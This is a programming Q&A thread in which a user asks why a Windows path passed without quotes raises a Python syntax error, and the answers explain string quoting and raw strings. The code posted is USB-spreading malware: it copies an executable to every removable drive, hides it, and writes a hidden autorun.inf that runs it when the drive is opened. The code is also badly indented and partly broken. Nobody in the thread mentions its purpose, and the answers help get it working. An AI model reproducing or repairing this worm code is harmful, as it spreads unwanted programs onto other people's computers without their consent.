# Syntax error while declaring path

Tags: python

wanted to know why is it a syntax error while compiling this script if I'm declaring a path?

I already searched a bit about it and couldn't find anything related to this, can someone explain me how to add a path ?

```
   if __name__ == "__main__":  # This isn't part of the actual code
       spread = Spreader (C:\Users\Test\bin.exe) # C: the ':' is the syntax error


import win32api
import win32con
import win32file
import sys
import os

class Spreader(object):
def __init__(self, path):    # path must be absolute
  print (" [*] Checking information")

  self.filename = path.split("\\")[-1]
  self.driveFilename = self.filename

  if not self.driveFilename.startswith("~"):
    self.driveFilename = "~" + self.driveFilename

  print ("\t- Local filename: ") + self.filename
  print ("\t- Driver filename: ") + self.driveFilename

  self.path = "\\".join(path.split("\\")[:-1]) + "\\" + self.filename

  print ("\t- Full path: ") + self.path

  print ("\n [*] Getting removable drives")
  self.drives = self.__getRemovableDrives()

  if len(self.drives) == None:
    print (" [-] No removable drives available")
  sys.exit()

  for drive in self.drives:
    print ("\t- ") + drive

  print ("\n [*] Spreading")
  self.__spread()

  print ("\n [+] Successfully spread")

def __getRemovableDrives(self):
  removableDrives = []
  drives = win32api.GetLogicalDriveStrings().split("\000")[:-1]

  for drive in drives:
    driveType = win32file.GetDriveType(drive)

  if driveType == win32file.DRIVE_REMOVABLE:
        removableDrives.append(drive)

  return removableDrives

def __spread(self):
  for drive in self.drives:

    if drive == "A:\\":
        continue

  else:

        driveFile = drive + self.driveFilename
        driveAutorun = drive + "autorun.inf"

        print (" [+] ") + drive

        if not os.path.exists(driveFile):
          self.__copyFile(driveFile)

        if not os.path.exists(driveAutorun):
          self.__createAutorun(driveAutorun)

def __copyFile(self, driveFile):
  print ("\t- Copying file: ") + self.driveFilename,
  win32file.CopyFile(self.path, driveFile, 0)
  print ("\t\t\tDONE")

  print ("\t- Hidding file"),
  win32api.SetFileAttributes(driveFile,\
         win32con.FILE_ATTRIBUTE_HIDDEN)
  print ("\t\t\tDONE")

def __createAutorun(self, driveAutorun):
  print ("\t- Creating autorun.inf"),
  autorun = open(driveAutorun, "w")
  content = """[Autorun]
open={0}
icon={0}
label=Python Spreader
UseAutoPlay=1
action=Start my App
action=@{0}
shell\open=Open
shell\open\Command={0}
shell\explore=explore
shell\explore\command={0}""".format(self.driveFilename)
  autorun.write(content)
  autorun.close()
  print ("\t\t\tDONE")

  print ("\t- Hidding autorun"),
  win32api.SetFileAttributes(driveAutorun,\
         win32con.FILE_ATTRIBUTE_HIDDEN)
  print ("\t\t\tDONE")

  if __name__ == "__main__":
       spread = Spreader (C:\Users\Test\bin.exe)
```

Comment: You are not passing your path as a string.

Answer (score 1, accepted):

This syntax error :

```
spread = Spreader (C:\Users\Test\bin.exe)
```

is because you do not quote your path.  Also, you have back-slashes in your path (did you know Windows also excepts / as a directory separator?), so use a raw string:

```
spread = Spreader(r"C:\Users\Test\bin.exe")
```

As @domoarrigato mentioned, you will note that I have removed the white-space between the function call `Spreader` and the parentheses.  This is to conform to the Python style-guide PEP008, and makes no difference to your syntax error.

Comment: he also has an extra space

Answer (score 3):

You must enclose the path in quotes to make it a string:

```
spread = Spreader('C:/Users/Test/bin.exe')
```

Comment: Also you changed the \ to be /, to avoid any [escape sequence](https://docs.python.org/2/reference/lexical_analysis.html#string-literals) problems, particuarly \t and \b.